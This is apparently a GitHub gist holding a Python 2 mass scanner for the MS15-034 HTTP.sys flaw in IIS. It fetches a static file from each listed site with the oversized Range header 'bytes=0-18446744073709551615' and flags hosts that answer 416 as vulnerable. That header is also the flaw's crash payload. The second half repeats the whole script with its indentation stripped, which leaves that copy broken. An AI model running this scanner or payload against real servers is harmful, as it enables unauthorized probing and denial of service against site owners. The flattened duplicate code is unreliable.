milo2012/ms15-034_multi.py

## ms15-034_multi.py
#!/usr/bin/env python
import optparse
import re
import requests
import sys
import lxml
import urllib2
from lxml import html
from bs4 import BeautifulSoup

requests.packages.urllib3.disable_warnings()

class colors:
	def __init__(self):
		self.green = "\033[92m"
		self.blue = "\033[94m"
		self.bold = "\033[1m"
		self.yellow = "\033[93m"
		self.red = "\033[91m"
		self.end = "\033[0m"
color = colors()

#Defining the main function.
def main(url):
	print color.green+"[*] Testing "+color.end + url
	try:
		#Defining the Headers.
		headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0",
					"Accept-Encoding": "gzip, deflate",
					"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
					"Range": "bytes=0-18446744073709551615",
					"Referer": "https://github.com/zigoo0/",
					"Connection": "keep-alive"
					}
		#Sending the Request.
		r = requests.get(url, headers=headers, verify=False, timeout=5)
		if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text:
			#print r.status_code.
			print "[*] %s"%(url) + color.red+" is Vulnerable!\n"+color.end
			#Adding the vulnerable hosts to a SET for later use and to make sure it's a unique host.
			vulnerable.add(url)
		else:
			#print r.status_code
			print "[*] Seems %s "%(url) + color.green+" is not vulnerable!\n"+color.end
			#Adding the non-vulnerable hosts to a SET for later use.
			fixed.add(url)
	except Exception:
		pass


def parsePage(url):
	resultList=[]
	try:
		website = requests.get(url,verify=False)
		html = website.text
		pat = re.compile(r'<\s*img [^>]*src="([^"]+)')
		img = pat.findall(html)
		for x in img:
			resultList.append(x)
		pat = re.compile(r'<param [^>]*value="([^"]+)')
		img = pat.findall(html)
		img
		for x in img:
			if ".swf" in x:
				resultList.append(x)
	except requests.exceptions.ConnectTimeout:
		pass
	except requests.exceptions.SSLError:
		pass
	return resultList


if __name__ == "__main__":
	parser = optparse.OptionParser()
	parser.add_option('-f', action="store", dest="filename", help="file containing list of websites")
	options, remainder = parser.parse_args()
	if options.filename:
		hosts=[]
		print color.blue+"[*] Finding static objects on the webpages"+color.end
		urlList = [line.strip() for line in open(options.filename, 'r')]
		for url in urlList:
			uriPathList=parsePage(url)
			y=""
			if len(uriPathList)>0:
				y = url+"/"+uriPathList[0]
				print y
				hosts.append(y)
			else:
				print url
		vulnerable = set()
		fixed = set()
		print "\n"
		for host in hosts:
			url = host.strip()
			main(url)
		print color.red+"[*] %s found to be vulnerable."%(len(vulnerable)) +color.end
		for vuln in vulnerable:
			print "[-] ", vuln
	#!/usr/bin/env python
	import optparse
	import re
	import requests
	import sys
	import lxml
	import urllib2
	from lxml import html
	from bs4 import BeautifulSoup

	requests.packages.urllib3.disable_warnings()

	class colors:
	def __init__(self):
	self.green = "\033[92m"
	self.blue = "\033[94m"
	self.bold = "\033[1m"
	self.yellow = "\033[93m"
	self.red = "\033[91m"
	self.end = "\033[0m"
	color = colors()

	#Defining the main function.
	def main(url):
	print color.green+"[*] Testing "+color.end + url
	try:
	#Defining the Headers.
	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0",
	"Accept-Encoding": "gzip, deflate",
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8",
	"Range": "bytes=0-18446744073709551615",
	"Referer": "https://github.com/zigoo0/",
	"Connection": "keep-alive"
	}
	#Sending the Request.
	r = requests.get(url, headers=headers, verify=False, timeout=5)
	if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text:
	#print r.status_code.
	print "[*] %s"%(url) + color.red+" is Vulnerable!\n"+color.end
	#Adding the vulnerable hosts to a SET for later use and to make sure it's a unique host.
	vulnerable.add(url)
	else:
	#print r.status_code
	print "[*] Seems %s "%(url) + color.green+" is not vulnerable!\n"+color.end
	#Adding the non-vulnerable hosts to a SET for later use.
	fixed.add(url)
	except Exception:
	pass


	def parsePage(url):
	resultList=[]
	try:
	website = requests.get(url,verify=False)
	html = website.text
	pat = re.compile(r'<\simg [^>]src="([^"]+)')
	img = pat.findall(html)
	for x in img:
	resultList.append(x)
	pat = re.compile(r'<param [^>]*value="([^"]+)')
	img = pat.findall(html)
	img
	for x in img:
	if ".swf" in x:
	resultList.append(x)
	except requests.exceptions.ConnectTimeout:
	pass
	except requests.exceptions.SSLError:
	pass
	return resultList


	if __name__ == "__main__":
	parser = optparse.OptionParser()
	parser.add_option('-f', action="store", dest="filename", help="file containing list of websites")
	options, remainder = parser.parse_args()
	if options.filename:
	hosts=[]
	print color.blue+"[*] Finding static objects on the webpages"+color.end
	urlList = [line.strip() for line in open(options.filename, 'r')]
	for url in urlList:
	uriPathList=parsePage(url)
	y=""
	if len(uriPathList)>0:
	y = url+"/"+uriPathList[0]
	print y
	hosts.append(y)
	else:
	print url
	vulnerable = set()
	fixed = set()
	print "\n"
	for host in hosts:
	url = host.strip()
	main(url)
	print color.red+"[*] %s found to be vulnerable."%(len(vulnerable)) +color.end
	for vuln in vulnerable:
	print "[-] ", vuln